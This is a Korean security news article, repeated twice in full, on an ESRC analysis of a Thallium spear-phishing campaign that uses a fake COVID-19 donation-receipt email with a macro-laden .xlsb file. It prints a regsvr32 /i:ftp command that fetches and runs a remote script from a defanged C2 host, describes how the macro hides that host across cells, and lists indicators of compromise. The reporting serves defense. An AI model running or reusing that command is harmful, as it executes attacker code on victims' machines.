연말정산 시즌에 맞춰 기부금 영수증 발급 신청서 이메일로 위장
1월초 발생한 사설 주식 투자 메신저 악용 공격과 유사성 발견돼
[보안뉴스 원병철 기자] 북한의 해킹그룹으로 잘 알려진 탈륨(Thallium)이 코로나19 관련 기부증서를 사칭한 스피어피싱 공격을 수행한 것이 확인돼 관련자들의 주의가 요구된다. 최근 ‘2021 코로나19 대응을 위한 기부금 영수증 발급 신청서’ 문서로 사칭한 해킹 공격 정황이 포착됐다고 이스트시큐리티 시큐리티대응센터(ESRC)가 밝혔다. 이번 공격은 연말정산 시즌에 맞춰 마치 국내 특정 민간 구호협회에서 보낸 기부금 영수증 발급 신청서 이메일처럼 교묘하게 위장했다.
▲특정 재해구호협회 단체에서 발송한 것처럼 위장한 해킹 이메일 모습[자료=ESRC]
위의 이미지는 실제 공격에 사용된 이메일 화면 모습이며, 이외에도 다른 유사 공격도 진행되고 있다. 해당 이메일에는 ‘2021코로나19대응_기부증서.zip’란 이름의 압축파일이 첨부돼 있다. 압축파일 내부에는 △2021코로나19대응_기부증서.pdf와 △다량 기부금영수증 발급 신청서_양식_개인.xlsb 등 2개의 파일이 포함되어 있다.
먼저 ‘2021코로나19대응_기부증서.pdf’ 파일에는 기부증서 내용을 담고 있다. 대량 기부금영수증 발급 신청서_양식_개인.xlsb MS Excel 바이너리 워크시트(.xlsb)를 실행할 경우 마치 보호된 파일처럼 화면을 보여주고, ‘콘텐츠 사용’ 버튼 클릭을 유도한다. 만약 콘텐츠 사용을 선택해 매크로 기능이 허용되면 공격자의 명령제어(C&C) 서버로 접속해 추가 행위를 수행한다.
▲매크로 실행 유도 화면[자료=ESRC]
이처럼 정상적인 문서 화면을 보여주어 이용자로 하여금 아무런 문제가 없는 것처럼 속이고, 악성 파일에 노출된 것을 숨긴다. 하지만 해당 컴퓨터는 백그라운드에서 공격자가 지정한 FTP 서버로 접속해 추가 명령을 시도한다.
△[명령제어 C2 주소]
- ftp://mufasa:simba@kvz.factorgpu[.]com:21/forbaby.png
실제 ‘다량 기부금영수증 발급 신청서_양식_개인.xlsb’ 파일은 내부 매크로 시트에 아래 코드가 포함되어 있다.
▲macrosheets 내부 코드화면[자료=ESRC]
엑셀 시트에 포함된 명령어를 분석해 보면, 첫 번째 셀 문자에 등호(=) 기호를 사용해 수식으로 간주하도록 입력했고, 명령제어 서버 문자열을 각각 다른 셀에 한 문자씩 넣는 난독화 방식을 사용했다.
▲C2 서버 주소 셀 난독화 화면[자료=ESRC]
난독화된 문자열을 모두 해석하면 regsvr32.exe 명령을 통해 공격자가 지정한 FTP 서버로 접속하게 되며, Script Component Runtime 인자 등을 통해 호출한다.
regsvr32 /u /n /s /i:ftp://mufasa:simba@kvz.factorgpu[.]com/forbaby.png scrobj.dll
이 루틴으로 URL(FTP) 주소에 있는 임의의 악성 스크립트를 실행할 수 있고, 공격자의 의도에 따라 언제든지 추가 공격이 가능하다.
ESRC 연구원들은 이번 위협 사례를 조사하는 과정에서 지난 1월 3일 ‘탈륨 조직, 사설 주식 투자 메신저 악용해 소프트웨어 공급망 공격 수행’ 내용과 유사성이 높다는 것을 확인했다고 밝혔다. 당시 발견된 악성 문서 파일과 Tactics, Techniques, Procedures (TTPs)가 연관돼 있다는 것. 악성 문서파일의 마지막 수정자 계정이 ‘Asus’로 동일하다. 더불어 명령제어 서버로 사용된 Passive DNS 아이피 주소(23.106.160.32)가 정확히 일치한다.
▲사설 주식 투자 메신저 악용 공격과 이번 공격 유사성 비교[자료=ESRC]
△불법사용 전화번호 이용중지시스템(UNMS) 사용자 현황 조사_양식.xlsb
(search.greenulz[.]com / 23.106.160.32)
△다량 기부금영수증 발급 신청서_양식_개인.xlsb
(kvz.factorgpu[.]com / 23.106.160.32)
한국에서 탈륨 조직은 최근 가장 활성도가 높은 위협 행위자로 분류되어 있으며, 다양한 분야를 대상으로 광범위한 규모의 공격을 수행하고 있다. 이처럼 정교한 공급망 공격뿐만 아니라 가짜 서버를 직접 구축하기도 하며, 스피어피싱까지 거의 모든 공격수법을 동원하고 있다. 지금까지 기술한 내용 외에도 다수의 위협 사례가 지속적으로 포착되고 있으며, 국내 포털사 고객센터 이메일을 이용한 공격도 이어지고 있다.
특히, ESRC는 연말정산 시기를 노려 사회공학적 기법을 절묘하게 사용하는 등 갈수록 공격수법이 노골적이고 대담해지고 있다며, 이번 사례를 숙지해 유사한 위협에 노출되지 않도록 각별한 주의가 필요하다고 강조했다. 또한, 만에 하나라도 MS Office 문서 열람시 ‘콘텐츠 사용’ 클릭을 유도하는 경우 십중팔구 악성 문서일 가능성이 높다는 점을 명심해 달라고 당부했다.
[원병철 기자(boanone@boannews.com)]
1월초 발생한 사설 주식 투자 메신저 악용 공격과 유사성 발견돼
[보안뉴스 원병철 기자] 북한의 해킹그룹으로 잘 알려진 탈륨(Thallium)이 코로나19 관련 기부증서를 사칭한 스피어피싱 공격을 수행한 것이 확인돼 관련자들의 주의가 요구된다. 최근 ‘2021 코로나19 대응을 위한 기부금 영수증 발급 신청서’ 문서로 사칭한 해킹 공격 정황이 포착됐다고 이스트시큐리티 시큐리티대응센터(ESRC)가 밝혔다. 이번 공격은 연말정산 시즌에 맞춰 마치 국내 특정 민간 구호협회에서 보낸 기부금 영수증 발급 신청서 이메일처럼 교묘하게 위장했다.
▲특정 재해구호협회 단체에서 발송한 것처럼 위장한 해킹 이메일 모습[자료=ESRC]
위의 이미지는 실제 공격에 사용된 이메일 화면 모습이며, 이외에도 다른 유사 공격도 진행되고 있다. 해당 이메일에는 ‘2021코로나19대응_기부증서.zip’란 이름의 압축파일이 첨부돼 있다. 압축파일 내부에는 △2021코로나19대응_기부증서.pdf와 △다량 기부금영수증 발급 신청서_양식_개인.xlsb 등 2개의 파일이 포함되어 있다.
먼저 ‘2021코로나19대응_기부증서.pdf’ 파일에는 기부증서 내용을 담고 있다. 대량 기부금영수증 발급 신청서_양식_개인.xlsb MS Excel 바이너리 워크시트(.xlsb)를 실행할 경우 마치 보호된 파일처럼 화면을 보여주고, ‘콘텐츠 사용’ 버튼 클릭을 유도한다. 만약 콘텐츠 사용을 선택해 매크로 기능이 허용되면 공격자의 명령제어(C&C) 서버로 접속해 추가 행위를 수행한다.
▲매크로 실행 유도 화면[자료=ESRC]
이처럼 정상적인 문서 화면을 보여주어 이용자로 하여금 아무런 문제가 없는 것처럼 속이고, 악성 파일에 노출된 것을 숨긴다. 하지만 해당 컴퓨터는 백그라운드에서 공격자가 지정한 FTP 서버로 접속해 추가 명령을 시도한다.
△[명령제어 C2 주소]
- ftp://mufasa:simba@kvz.factorgpu[.]com:21/forbaby.png
실제 ‘다량 기부금영수증 발급 신청서_양식_개인.xlsb’ 파일은 내부 매크로 시트에 아래 코드가 포함되어 있다.
▲macrosheets 내부 코드화면[자료=ESRC]
엑셀 시트에 포함된 명령어를 분석해 보면, 첫 번째 셀 문자에 등호(=) 기호를 사용해 수식으로 간주하도록 입력했고, 명령제어 서버 문자열을 각각 다른 셀에 한 문자씩 넣는 난독화 방식을 사용했다.
▲C2 서버 주소 셀 난독화 화면[자료=ESRC]
난독화된 문자열을 모두 해석하면 regsvr32.exe 명령을 통해 공격자가 지정한 FTP 서버로 접속하게 되며, Script Component Runtime 인자 등을 통해 호출한다.
regsvr32 /u /n /s /i:ftp://mufasa:simba@kvz.factorgpu[.]com/forbaby.png scrobj.dll
이 루틴으로 URL(FTP) 주소에 있는 임의의 악성 스크립트를 실행할 수 있고, 공격자의 의도에 따라 언제든지 추가 공격이 가능하다.
ESRC 연구원들은 이번 위협 사례를 조사하는 과정에서 지난 1월 3일 ‘탈륨 조직, 사설 주식 투자 메신저 악용해 소프트웨어 공급망 공격 수행’ 내용과 유사성이 높다는 것을 확인했다고 밝혔다. 당시 발견된 악성 문서 파일과 Tactics, Techniques, Procedures (TTPs)가 연관돼 있다는 것. 악성 문서파일의 마지막 수정자 계정이 ‘Asus’로 동일하다. 더불어 명령제어 서버로 사용된 Passive DNS 아이피 주소(23.106.160.32)가 정확히 일치한다.
▲사설 주식 투자 메신저 악용 공격과 이번 공격 유사성 비교[자료=ESRC]
△불법사용 전화번호 이용중지시스템(UNMS) 사용자 현황 조사_양식.xlsb
(search.greenulz[.]com / 23.106.160.32)
△다량 기부금영수증 발급 신청서_양식_개인.xlsb
(kvz.factorgpu[.]com / 23.106.160.32)
한국에서 탈륨 조직은 최근 가장 활성도가 높은 위협 행위자로 분류되어 있으며, 다양한 분야를 대상으로 광범위한 규모의 공격을 수행하고 있다. 이처럼 정교한 공급망 공격뿐만 아니라 가짜 서버를 직접 구축하기도 하며, 스피어피싱까지 거의 모든 공격수법을 동원하고 있다. 지금까지 기술한 내용 외에도 다수의 위협 사례가 지속적으로 포착되고 있으며, 국내 포털사 고객센터 이메일을 이용한 공격도 이어지고 있다.
특히, ESRC는 연말정산 시기를 노려 사회공학적 기법을 절묘하게 사용하는 등 갈수록 공격수법이 노골적이고 대담해지고 있다며, 이번 사례를 숙지해 유사한 위협에 노출되지 않도록 각별한 주의가 필요하다고 강조했다. 또한, 만에 하나라도 MS Office 문서 열람시 ‘콘텐츠 사용’ 클릭을 유도하는 경우 십중팔구 악성 문서일 가능성이 높다는 점을 명심해 달라고 당부했다.
[원병철 기자(boanone@boannews.com)]
<저작권자: 보안뉴스(www.boannews.com) 무단전재-재배포금지>
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.JPG){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
.jpg){kind=small}
